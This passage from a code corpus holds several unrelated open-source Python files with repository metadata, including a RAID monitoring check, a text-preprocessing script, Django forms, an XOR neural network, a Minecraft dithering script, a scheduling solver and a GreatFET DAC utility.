] | 12 | 2017-12-14T23:42:45.000Z | 2020-05-29T15:11:02.000Z | fossor/checks/raid_status.py | NeolithEra/fossor | d8dbdc40f2f16da601c317dfa74b83e3932c9bb3 | [
"BSD-2-Clause"
] | 32 | 2017-12-14T17:51:57.000Z | 2020-06-12T13:11:47.000Z | # Copyright 2017 LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import os
import re
from fossor.checks.check import Check
class RaidStatus(Check):
def run(self, variables: dict):
'''Check if there are any drives down in a Raid Array.'''
mdstat_location = '/proc/mdstat'
if not os.path.exists(mdstat_location):
self.log.debug(f"{mdstat_location} does not exist.")
return
with open(mdstat_location, 'rt') as f:
mdstat = f.read()
arrays = re.findall('\[[U_]+\]', mdstat)
for array in arrays:
if '_' in array:
message = f"Drives down in Raid Array ({array})\n"
message += f"{mdstat_location} output:\n"
message += f"{mdstat}"
return message
| 32.25 | 100 | 0.601329 | 115 | 903 | 4.66087 | 0.573913 | 0.130597 | 0.044776 | 0.05597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007862 | 0.295681 | 903 | 27 | 101 | 33.444444 | 0.834906 | 0.230343 | 0 | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce4daa3cfa61c28a43cef1df7228c7cd3574d0f | 3,211 | py | Python | src/data_preprocess.py | Superar/hate-speech | acc02755fe5d2f60eeda040239059c57bce52265 | [
"MIT"
] | null | null | null | src/data_preprocess.py | Superar/hate-speech | acc02755fe5d2f60eeda040239059c57bce52265 | [
"MIT"
] | null | null | null | src/data_preprocess.py | Superar/hate-speech | acc02755fe5d2f60eeda040239059c57bce52265 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import os
import gensim
import pickle
import string
import numpy as np
import pandas as pd
from scipy.stats import pearsonr
from nltk.corpus import stopwords
from gensim.models import Word2Vec
from nltk import word_tokenize
from nltk.stem import SnowballStemmer
from sklearn.feature_extraction.text import CountVectorizer
data_header = '../data/'
def read_data(metadata,path):
filenames = os.listdir(path)
file_ids = [os.path.splitext(f)[0] for f in filenames]
labels = metadata[metadata['file_id'].isin(file_ids)].label
labels = pd.get_dummies(labels)['hate']
stop_words = set(stopwords.words('portuguese'))
pt_stemmer = SnowballStemmer('portuguese')
# translator = str.maketrans('','', string.punctuation)
corpus = []
for f in filenames:
text = open(path+f).read().lower()
# text = text.translate(translator)
tokens = word_tokenize(text,language='portuguese')
sentence = ''
for token in tokens:
if not token in stop_words:
sentence += pt_stemmer.stem(token) + ' '
corpus.append(sentence)
return corpus,labels
def word2vec(data,k=300,path='../data/model.bin'):
corpus = [word_tokenize(sentence) for sentence in data]
try:
model = Word2Vec.load(path)
except:
model = Word2Vec(corpus, size=k, window=5, min_count=1, workers=4)
model.save(path)
transformed_corpus = []
for example in corpus:
vec = np.zeros(k)
for word in example:
try:
vec += model[word]
except:
print(word,'is not part of vocab')
vec /= k
transformed_corpus.append(vec)
return transformed_corpus
def select_by_corr(corpus,labels,top_n=1000):
vectorizer = CountVectorizer()
bow = vectorizer.fit_transform(corpus)
corrs = []
for col in bow.toarray().T:
corr, _ = pearsonr(col, labels)
corrs.append(corr)
vocab = np.asarray(vectorizer.get_feature_names())
sorted_idxs = np.argsort(np.abs(corrs))[-top_n:]
top_sorted = vocab[sorted_idxs]
selected_corpus = []
for sentence in corpus:
s = ''
sentence = word_tokenize(sentence)
for word in sentence:
if word in top_sorted:
s += word + ' '
selected_corpus.append(s)
return selected_corpus
def save_features(path='../hate-speech-dataset/sampled_train/',suffix='train'):
metadata = pd.read_csv('../hate-speech-dataset/annotations_metadata.csv')
corpus,labels = read_data(metadata,path)
corpus1 = word2vec(corpus)
with open(data_header + 'word2vec_'+suffix+'.pickle', 'wb') as f:
pickle.dump(corpus1, f, pickle.HIGHEST_PROTOCOL)
for i in [500,1000]:
print(i)
corpus2 = select_by_corr(corpus,labels,i)
with open(data_header + 'selected'+str(i)+'_'+suffix+'.pickle', 'wb') as f:
pickle.dump(corpus2, f, pickle.HIGHEST_PROTOCOL)
def main():
save_features('../hate-speech-dataset/sampled_train/','train')
save_features('../hate-speech-dataset/sampled_test/','test')
if __name__ == '__main__':
main() | 29.731481 | 83 | 0.642479 | 403 | 3,211 | 4.972705 | 0.349876 | 0.023952 | 0.033932 | 0.035928 | 0.103792 | 0.062874 | 0.026946 | 0 | 0 | 0 | 0 | 0.011827 | 0.236375 | 3,211 | 108 | 84 | 29.731481 | 0.805465 | 0.034257 | 0 | 0.048193 | 0 | 0 | 0.097773 | 0.050662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060241 | false | 0 | 0.144578 | 0 | 0.240964 | 0.024096 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce5b0e14e8819235945155dd2844577ff1df613 | 980 | py | Python | insta/forms.py | Nkurumwa/instaclone | b28d65a351abe350def66c88ee0d701cfe3784fb | [
"MIT"
] | 1 | 2021-07-24T15:29:35.000Z | 2021-07-24T15:29:35.000Z | instagram/forms.py | sharon002/insta-gram | dcce96464a4e51485f7a077299dcd3adf34da078 | [
"MIT"
] | 2 | 2021-06-08T20:37:10.000Z | 2021-09-08T01:26:46.000Z | insta/forms.py | Nkurumwa/instaclone | b28d65a351abe350def66c88ee0d701cfe3784fb | [
"MIT"
] | 1 | 2021-07-24T15:29:36.000Z | 2021-07-24T15:29:36.000Z | from django import forms
from django.contrib.auth.forms import UserCreationForm
from .models import Comment, Image, Profile
from django.contrib.auth.models import User
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
exclude = ['image', 'user']
class ImageForm(forms.ModelForm):
class Meta:
model = Image
exclude = ['likes', 'post_date', 'profile']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['profile_photo', 'bio']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class PostIMageForm(forms.ModelForm):
class Meta:
model = Image
fields = ['image', 'image_caption'] | 24.5 | 64 | 0.652041 | 101 | 980 | 6.29703 | 0.346535 | 0.084906 | 0.132075 | 0.144654 | 0.371069 | 0.283019 | 0.179245 | 0.179245 | 0.179245 | 0.179245 | 0 | 0.002674 | 0.236735 | 980 | 40 | 65 | 24.5 | 0.847594 | 0 | 0 | 0.4 | 0 | 0 | 0.110092 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.033333 | 0.133333 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cee8dcc6601bc078015e3b03c773e86c36ea5da | 10,863 | py | Python | NeuralNetworks/XOR_2LayerNN/xor_bck_prop.py | Sumit1673/Projects | 82e3d352617655bb27be460acfc443fe9c741e24 | [
"MIT"
] | null | null | null | NeuralNetworks/XOR_2LayerNN/xor_bck_prop.py | Sumit1673/Projects | 82e3d352617655bb27be460acfc443fe9c741e24 | [
"MIT"
] | null | null | null | NeuralNetworks/XOR_2LayerNN/xor_bck_prop.py | Sumit1673/Projects | 82e3d352617655bb27be460acfc443fe9c741e24 | [
"MIT"
] | null | null | null | from matplotlib.colors import ListedColormap
import numpy as np
from random import seed
from math import exp
from random import random
import matplotlib.pyplot as plt
# Activation functions
sigmoid_functn = lambda x: 1/(1+ np.exp(-x))
sigmoid_derivative = lambda x: x * (1-x)
# Question(a): Analyzing the input to hidden weights by applying different types of distribution
# to generate the weights randomly: random weights, binomially distributed, uniformally distributed
# non-bounded normal distribution of the weights
def truncated_normal(mean=0, sd=1, low=0, upp=10):
from scipy.stats import truncnorm
return truncnorm(
(low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)
class XORNeuralNetwork:
"""
Network Arch : 2 ,2, 1
Network with 2 inputs, 2 neurons in a hidden layer, and one output
"""
def __init__(self, arch):
"""CREATING LAYERS AND ITS CORRESPONDING WEIGHTS
No. of weights depends upon the number of neurons in the previous layer and bias depends upon
no. of neurons in the present layer.
the weights created here are the parameters which effect the output of that layer when multiplied
with the output from the previous layers. Lets consider the previous layer as input layer and its output
is nothing but the input. Now, this o/p gets multiplied by the weights of the Hidden layer. The
function of a neuron in a layer is to perform the weighted sum and apply a non-linear function on the
sum to understand the liveliness of that neuron."""
np.random.seed(0)
# Initialized the weights, activation function and epochs
self.activation_func = sigmoid_functn
self.activitation_func_deriv = sigmoid_derivative
self.layers = len(arch)
self.steps_per_epoch = 100
self.arch = arch
self.weights = []
# Intializing weights with random values b/w -1 ,1
for each_layer in range(self.layers - 1): # for inp to hidden and hidden to out
#-------------------- inp/hidden ----------hidden/out
w = 2*np.random.rand(arch[each_layer] + 1, arch[each_layer+1]) - 1
# w = 2*np.random.binomial(1, 0.1, size=(arch[each_layer] + 1, arch[each_layer+1])) -1
# un-bounded Normally distributed weights, results change if standard deviation or mean values are changed
# X = truncated_normal(mean=0, sd=1, low=-1, upp=1)
# w = X.rvs([arch[each_layer] + 1, arch[each_layer+1]])
self.weights.append(w)
# plt.hist(self.weights[0])
# plt.show()
return
def fit_model(self, training_set, expected_outputs, learning_rate=0.1, epochs=100):
self.error_vs_epoch = np.zeros(shape=(epochs,1))
# concatenating one for the bias with the existing weights of the neurons
ones = np.ones((1, training_set.shape[0]))
X = np.concatenate((ones.T, training_set), axis=1)
self.plot_hidden_layer_output(training_set, expected_outputs, title="Before training")
for each_epoch in range(epochs):
# training randomly not in sequence
random_train_sample = np.random.randint(training_set.shape[0])
# Feeding values to the network with a forward pass
_set = [X[random_train_sample]]
y_hat = self.forward_pass(_set)
# plot_inp_out_weigthts(self.weights[0])
# Finding out the change needed to be made to the weights using back propogation
y = expected_outputs[random_train_sample]
error = self.back_propogation(y_hat, y, learning_rate)
self.error_vs_epoch[each_epoch] = error[-1]
if (each_epoch+1) % 10000 == 0:
print('epochs: {}'.format(each_epoch + 1))
print('Error: {}'.format(error[-1]))
self.plot_decision_line(training_set, expected_outputs)
self.plot_error()
# Plot data and results ############################
def plot_error(self):
fig, ax = plt.subplots()
plt.plot(self.error_vs_epoch)
ax.set(xlabel='Epochs', ylabel=' Error',
title='Error Vs Epochs')
ax.grid()
plt.show()
def forward_pass(self, train_set):
"""
Take each input and forward it to each neuron. At each neuron weighted sum of all the inputs that comes from
the nodes of the previous layer. Then the weighted sum is passed to the activation function to find the
reaction of a neuron for a given set of inputs.
:param train_set:
:return: will be a np. array with the output of all the neurons
"""
for i in range(len(self.weights)-1):
activation = np.dot(train_set[i], self.weights[i])
activity = sigmoid_functn(activation)
# add the bias for the next layer
activity = np.concatenate((np.ones(1), np.array(activity)))
train_set.append(activity)
# last layer
activation = np.dot(train_set[-1], self.weights[-1])
activity = sigmoid_functn(activation)
train_set.append(activity)
return train_set
def back_propogation(self, Y_hat, Y, lr):
error = (Y - Y_hat[-1])
# delta = dL/dz --> z is the output of the output neuron. This delta will be multiplied to all the neurons
# plus the local gradient i.e. gradient of error w.r.t. to output of each neuron.
delta_vec = [error * sigmoid_derivative(Y_hat[-1])]
# Traversing backwards
for i in range(self.layers-2, 0, -1):
error = delta_vec[-1].dot(self.weights[i][1:].T)
error = error * sigmoid_derivative(Y_hat[i][1:])
delta_vec.append(error)
delta_vec.reverse()
# Stochastic gradient descent for weights optimization
for i in range(len(self.weights)):
layer = Y_hat[i].reshape(1, self.arch[i]+1) # from (3,1) --> (1,3)
delta = delta_vec[i].reshape(1, self.arch[i+1])
# self.weights[i] += lr*layer.T.dot(delta)
np.add(self.weights[i], lr*layer.T.dot(delta), out=self.weights[i], casting="unsafe")
return error
def predict(self, test_data):
prediction = np.array([]).reshape(0, self.arch[-1])
for data_points in test_data:
y = np.array([self.predict_single_data(data_points)])
prediction = np.vstack((prediction, y))
return prediction
def predict_single_data(self, x):
# concatenating one to make the dimension of the i/p vector equivalent to the dimension of weight vector
x = np.concatenate((np.ones(1).T, np.array(x)))
# forwarding the data to all the weights of the neuron
for each_weight in range(0, len(self.weights)):
x = sigmoid_functn(np.dot(x, self.weights[each_weight]))
x = np.concatenate((np.ones(1).T, np.array(x)))
return x[1]
def plot_hidden_layer_output(self, train_set, labels, title=None):
bias = np.array([self.weights[0][0]]).T
fired_op = neuron_operation(self.weights[0][1:], bias, train_set)
# bias = np.array([self.weights[0][0]])
# hidden_layer_out = np.dot(self.weights[0][1:], np.transpose(train_set)) + bias.T
# print(hidden_layer_out)
# fired_op = sigmoid_functn(hidden_layer_out)
# print(fired_op)
plt.scatter(fired_op[0,:], fired_op[1,:],c=np.reshape(labels,-1),alpha=1)
plt.xlabel("X axis")
plt.ylabel("Y axis")
plt.title(title)
plt.show()
def plot_decision_line(self, train_set, labels):
hidden_layer_op1 = neuron_operation(self.weights[0][1:], np.array([self.weights[0][0]]).T, train_set)
hidden_layer_op2 = neuron_operation(self.weights[1][1:].T, np.array([self.weights[1][0]]), hidden_layer_op1.T)
cx = self.weights[1][1]
cy = self.weights[1][2]
c = -self.weights[1][0]
plt.scatter(hidden_layer_op1[0,:], hidden_layer_op1[1,:], c=np.reshape(labels,-1),alpha=1)
plt.plot(([-1,2]),([(c/cy-cx*-1/cy).reshape(1,),(c/cy-cx*2/cy).reshape(1,)]),c='r',marker='x')
plt.xlabel("X axis")
plt.ylabel("Y axis")
plt.show()
def neuron_operation(weights, bias, train_set):
hidden_layer_out = np.dot(weights, np.transpose(train_set)) + bias
print(hidden_layer_out)
return sigmoid_functn(hidden_layer_out)
def decision_boundary_plot(X, y, nn, test_idx=None, resolution=0.02):
# Two decision boundary are required to separate the non-linear XOR data
# setup marker generator and color map
markers = ('s', 'x', 'o', '^', 'v')
colors = ('green', 'red', 'darkgreen', 'black', 'blue')
cmap = ListedColormap(colors[:len(np.unique(y))])
# plot the decision surface
x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1
x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),
np.arange(x2_min, x2_max, resolution))
Z = nn.predict(np.array([xx1.ravel(), xx2.ravel()]).T)
Z = Z.reshape(xx1.shape)
plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)
plt.xlim(xx1.min(), xx1.max())
plt.ylim(xx2.min(), xx2.max())
# plot class samples
for idx, cl in enumerate(np.unique(y)):
plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1],
alpha=0.8, c=cmap(idx),
marker=markers[idx], label=cl)
# highlight test samples
if test_idx:
# plot all samples
X_test, y_test = X[test_idx, :], y[test_idx]
plt.scatter(X_test[:, 0],
X_test[:, 1],
c='',
alpha=1.0,
linewidths=1,
marker='o',
s=55, label='test set')
# def plot_inp_out_weigthts(weights):
# from matplotlib.animation import FuncAnimation
# plt.style.use('seaborn-pastel')
# fig = plt.figure()
# ax = plt.axes(xlim=(0, 4), ylim=(-2, 2))
# line, = ax.plot([], [], lw=3)
if __name__ == '__main__':
seed(0)
# train_data = np.array([[0, 0], [0, 1],
# [1, 0], [1, 1]])
train_data = np.array([[-1, 1], [-1, -1],
[1, 1], [1, -1]])
l_rate = .001
epochs = 8000000
labels = np.array([1, -1, -1, 1])
# labels = np.array([0, 1,
# 1, 0])
xor = XORNeuralNetwork([2, 2, 1])
xor.fit_model(train_data, labels, l_rate, epochs)
decision_boundary_plot(train_data, labels, xor)
plt.xlabel('x-axis')
plt.ylabel('y-axis')
plt.legend(loc='upper left')
plt.tight_layout()
plt.show()
# print("Predictions..")
# for s in train_data:
# print(s, xor.predict_single_data(s))
| 40.533582 | 118 | 0.607199 | 1,571 | 10,863 | 4.078931 | 0.210694 | 0.042915 | 0.014981 | 0.013109 | 0.141542 | 0.099563 | 0.088015 | 0.053995 | 0.040886 | 0.009363 | 0 | 0.026408 | 0.260978 | 10,863 | 267 | 119 | 40.685393 | 0.771799 | 0.32201 | 0 | 0.094595 | 0 | 0 | 0.022832 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.013514 | 0.047297 | 0 | 0.182432 | 0.02027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cf34e54df0106bc49c66a61fb987361ac4ea3e2 | 1,836 | py | Python | mcpipy/dither.py | wangtt03/raspberryjammod | d828d1b225c0dfc25d91f4e3569ce620fa231e14 | [
"MIT"
] | 338 | 2015-01-20T15:07:48.000Z | 2022-02-25T17:31:06.000Z | mcpipy/dither.py | wangtt03/raspberryjammod | d828d1b225c0dfc25d91f4e3569ce620fa231e14 | [
"MIT"
] | 58 | 2015-03-26T12:21:41.000Z | 2022-02-20T21:01:33.000Z | mcpipy/dither.py | wangtt03/raspberryjammod | d828d1b225c0dfc25d91f4e3569ce620fa231e14 | [
"MIT"
] | 112 | 2015-08-10T19:20:44.000Z | 2022-02-23T08:58:52.000Z | #
# Code by Alexander Pruss and under the MIT license
#
#
from mine import *
import colors
import sys
import os
from PIL import Image
from fonts import FONTS
import random
import text
mc = Minecraft()
pos = mc.player.getTilePos()
filename = sys.argv[1]
if not os.path.isfile(filename):
filename = os.path.dirname(os.path.realpath(sys.argv[0])) + "/" + filename
if len(sys.argv) > 2:
height = int(sys.argv[2])
else:
height = 140
image = Image.open(filename).convert('RGBA')
scale = height / float(image.size[1])
width = int(image.size[0] * scale)
def getPixel(z):
x = z[0] / scale
if x >= image.size[0]: x = image.size[0] - 1
y = z[1] / scale
if y >= image.size[1]: y = image.size[1] - 1
return image.getpixel((x,image.size[1]-1-y))
def clamp(x,a,b):
return min(b,max(x,a))
dithers = [
(None, 'undithered'),
(colors.DitheringMethod(fs=True), 'Floyd-Steinberg'),
(colors.DitheringMethod(rng=lambda:random.uniform(-10,10)), 'uniform 10'),
(colors.DitheringMethod(rng=lambda:random.uniform(-20,20)), 'uniform 20'),
(colors.DitheringMethod(rng=lambda:random.uniform(-40,40)), 'uniform 40'),
(colors.DitheringMethod(rng=lambda:clamp(random.gauss(0,10),-30,30)), 'gaussian 10/30'),
(colors.DitheringMethod(rng=lambda:clamp(random.gauss(0,20),-30,30)), 'gaussian 20/30') ]
x0 = pos.x
for dither,name in dithers:
for (x,y,block) in colors.imageToBlocks(getPixel, width, height, dither=dither):
mc.setBlock(x+x0,y+pos.y,pos.z,block)
text.drawText(mc, FONTS['thin9pt'],
Vec3(x0,pos.y+height+1,pos.z),
Vec3(1,0,0), Vec3(0,1,0),
name, block.SEA_LANTERN, background=None)
x0 += width + 2
| 29.142857 | 94 | 0.604031 | 266 | 1,836 | 4.165414 | 0.338346 | 0.056859 | 0.108303 | 0.135379 | 0.201264 | 0.201264 | 0.084838 | 0.084838 | 0 | 0 | 0 | 0.053229 | 0.232571 | 1,836 | 63 | 95 | 29.142857 | 0.733144 | 0.026688 | 0 | 0 | 0 | 0 | 0.0552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.177778 | 0.022222 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cf46c8a25376e29c092df80bf64c3ea9315de27 | 1,452 | py | Python | py/align.py | Eagleair/Eaglevlog | 9d4a02d76f07375564b5393da76250376e4d4de0 | [
"MIT"
] | null | null | null | py/align.py | Eagleair/Eaglevlog | 9d4a02d76f07375564b5393da76250376e4d4de0 | [
"MIT"
] | null | null | null | py/align.py | Eagleair/Eaglevlog | 9d4a02d76f07375564b5393da76250376e4d4de0 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
# -*- coding: UTF-8 -*-
import re
import numpy as np
# 对齐函数,参数1:多行字符串,必须字符串相等的列。参数2:tab代表多少空格。参数3:需要在返回结果的首列加多少个tab
def align(str_many,ts_conut,ints):
line_list_conut = []
line_list = []
for line in str_many.splitlines(): #提取字符单词并存入a数组
line_list.append(re.findall('\S+',line))
a = np.array(line_list,dtype=object)
col_same = np.where(np.all(a == a[0,...],axis=0)) #获取所有元素相同的列
col_same = np.asarray(col_same,dtype=np.int8)
if a.shape[1]-1 in col_same:
a = np.insert(a,a.shape[1],'',axis=1)
for col in col_same[0]:
a[...,col+1] = a[...,col] + ' ' + a[...,col+1] #合并到下一列
a = np.delete(a,col_same,axis=1)
str_len=np.char.str_len(np.asarray(a,dtype=np.str))//ts_conut #计算字符单词占用tas的个数
a=np.asarray(a,dtype=[('strs','O'),('tab','O')])
str_len=np.amax(str_len,axis=0)+1-str_len #每个单词后面需要补多少个tas才对齐
a['tab'] = str_len
a['strs'] = a['strs'] + a['tab']*'\t'
a['strs'][...,-1] =np.vectorize(lambda s: s[:-1])(a['strs'][...,-1]) #删除最后一列元素的最后一个字符:\t
astr = a['strs']
tstr = ints * '\t'
astr = np.insert(astr,0,tstr,axis=1)
astr = np.insert(astr,astr.shape[1],'\n',axis=1)
astr = astr.reshape(-1)
astr = np.delete(astr,-1)
str_r = ''
str_r = ''.join(str(i) for i in astr)
return str_r
| 42.705882 | 99 | 0.5427 | 223 | 1,452 | 3.426009 | 0.336323 | 0.054974 | 0.031414 | 0.039267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024954 | 0.254821 | 1,452 | 33 | 100 | 44 | 0.681146 | 0.128099 | 0 | 0 | 0 | 0 | 0.0358 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cf65b5737b7175582cda39ca10875f5a95bc200 | 2,392 | py | Python | solve_with_mip_1.py | thesamovar/nmc_scheduling | ee003796fb32d8d523ac8a912ab06da6229e1240 | [
"MIT"
] | null | null | null | solve_with_mip_1.py | thesamovar/nmc_scheduling | ee003796fb32d8d523ac8a912ab06da6229e1240 | [
"MIT"
] | null | null | null | solve_with_mip_1.py | thesamovar/nmc_scheduling | ee003796fb32d8d523ac8a912ab06da6229e1240 | [
"MIT"
] | null | null | null | #%% Imports
import numpy as np
import pickle
import mip
#%% Load data
data = pickle.load(open('times_and_prefs_1k.pickle', 'rb'))
free_times = data['free_times']
prefs = data['prefs']
talk_clusters = data['talk_clusters']
talk_interestingness = data['talk_interestingness']
num_talks = data['num_talks']
num_times = data['num_times']
num_participants = len(prefs)
#%% Generate matrices
I = np.zeros((num_participants, num_talks), dtype=int)
A = np.zeros((num_participants, num_times), dtype=int)
F = np.zeros((num_talks, num_times), dtype=int)
for p, f in enumerate(free_times):
A[p, f] = 1
for t, f in enumerate(free_times[:num_talks]):
F[t, f] = 1
for p, interest in enumerate(prefs):
I[p, interest] = 1
#%% Run analysis
model = mip.Model()
# Add decision variables
S = [[model.add_var(f'S({t},{s})', var_type=mip.BINARY) for s in range(num_times)] for t in range(num_talks)]
V = [[[model.add_var(f'V({p},{t},{s})', var_type=mip.BINARY) for s in range(num_times)] for t in range(num_talks)] for p in range(num_participants)]
# Add constraints
# only assign a talk to one slot
for t in range(num_talks):
model += mip.xsum(S[t][s] for s in range(num_times))<=1#, f"talk_to_slot({t})"
# only assign talks to free slots
for s in range(num_times):
for t in range(num_talks):
model += S[t][s]<=F[t, s]
# viewers only watch talks in given slots if they're available and interested
for p in range(num_participants):
for t in range(num_talks):
for s in range(num_times):
model += V[p][t][s] <= S[t][s]
model += V[p][t][s] <= A[p, s]
model += V[p][t][s] <= I[p, t]
# can only watch at most one talk per slot
for p in range(num_participants):
for s in range(num_times):
model += mip.xsum(V[p][t][s] for t in range(num_talks))<=1
# Add objective
model.objective = mip.maximize(mip.xsum(V[p][t][s] for p in range(num_participants) for t in range(num_talks) for s in range(num_times)))
#%% Solve it
model.optimize()
#%% Show the solution
print(f'Number of watch hours is {model.objective_value}')
for t in range(num_talks):
for s in range(num_times):
if S[t][s].x:
break
print(f'Assign talk {t} to slot {s}')
can_watch = []
for p in range(num_participants):
if V[p][t][s].x:
can_watch.append(p)
print(f' Participants that can watch: {can_watch}') | 33.690141 | 148 | 0.656773 | 426 | 2,392 | 3.561033 | 0.206573 | 0.096902 | 0.138431 | 0.058009 | 0.413975 | 0.350692 | 0.282136 | 0.208306 | 0.208306 | 0.208306 | 0 | 0.003093 | 0.188963 | 2,392 | 71 | 149 | 33.690141 | 0.778866 | 0.143395 | 0 | 0.22 | 0 | 0 | 0.115422 | 0.023576 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.06 | 0 | 0.06 | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cfb7fe67f51c09c752c76cb4d875796fa9edaf6 | 1,437 | py | Python | host/greatfet/commands/greatfet_dac.py | grvvy/greatfet | e8098307960a60e34c27ed2903f7abc2252b4cce | [
"BSD-3-Clause"
] | 328 | 2015-08-30T03:10:50.000Z | 2022-03-31T12:47:48.000Z | host/greatfet/commands/greatfet_dac.py | grvvy/greatfet | e8098307960a60e34c27ed2903f7abc2252b4cce | [
"BSD-3-Clause"
] | 231 | 2017-02-11T23:21:31.000Z | 2022-03-27T23:07:43.000Z | host/greatfet/commands/greatfet_dac.py | grvvy/greatfet | e8098307960a60e34c27ed2903f7abc2252b4cce | [
"BSD-3-Clause"
] | 94 | 2015-09-27T15:01:04.000Z | 2022-02-26T15:41:20.000Z | #!/usr/bin/env python3
#
# This file is part of GreatFET
from __future__ import print_function
import errno
import sys
import greatfet
from greatfet import GreatFET
from greatfet.utils import log_silent, log_verbose
def main():
from greatfet.utils import GreatFETArgumentParser
# Set up a simple argument parser.
parser = GreatFETArgumentParser(description="Utility for experimenting with GreatFET's DAC", verbose_by_default=True)
parser.add_argument('-f', '--format', dest='format', type=str, default='voltage',
choices=['voltage', 'raw'],
help="Format for the input.\nVoltage string, or binary value to be loaded into the DAC.")
parser.add_argument('value', metavar='[value]', type=float,
help="The desired voltage (default) or raw value to load into DAC (with -f raw).")
args = parser.parse_args()
log_function = parser.get_log_function()
device = parser.find_specified_device()
device.apis.dac.initialize()
if args.format == "voltage":
# Voltage must be passed to the device in millivolts, so * 1000.
device.apis.dac.set_voltage(int(args.value * 1000))
log_function("DAC set to {} volts".format(args.value))
else:
device.apis.dac.set_value(int(args.value))
log_function("DAC set to {}".format(int(args.value)))
if __name__ == '__main__':
main()
| 31.23913 | 121 | 0.664579 | 187 | 1,437 | 4.951872 | 0.449198 | 0.047516 | 0.042117 | 0.056156 | 0.041037 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008079 | 0.224774 | 1,437 | 45 | 122 | 31.933333 | 0.82316 | 0.102296 | 0 | 0 | 0 | 0 | 0.227237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.269231 | 0 | 0.307692 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cfbf92d7ba10604d7c4e6ca34af19ffe9d135ca | 7,668 | py | Python | assists/lopper_lib.py | nagasureshkumar/lopper | 8c5f34181a246cdd8ed8ed4ba6e32de017940af8 | [
"BSD-3-Clause"
] | null | null | null | assists/lopper_lib.py | nagasureshkumar/lopper | 8c5f34181a246cdd8ed8ed4ba6e32de017940af8 | [
"BSD-3-Clause"
] | null | null | null | assists/lopper_lib.py | nagasureshkumar/lopper | 8c5f34181a246cdd8ed8ed4ba6e32de017940af8 | [
"BSD-3-Clause"
] | null | null | null | #/*
# * Copyright (c) 2020 Xilinx Inc. All rights reserved.
# *
# * Author:
# * Bruce Ashfield <bruce.ashfield@xilinx.com>
# *
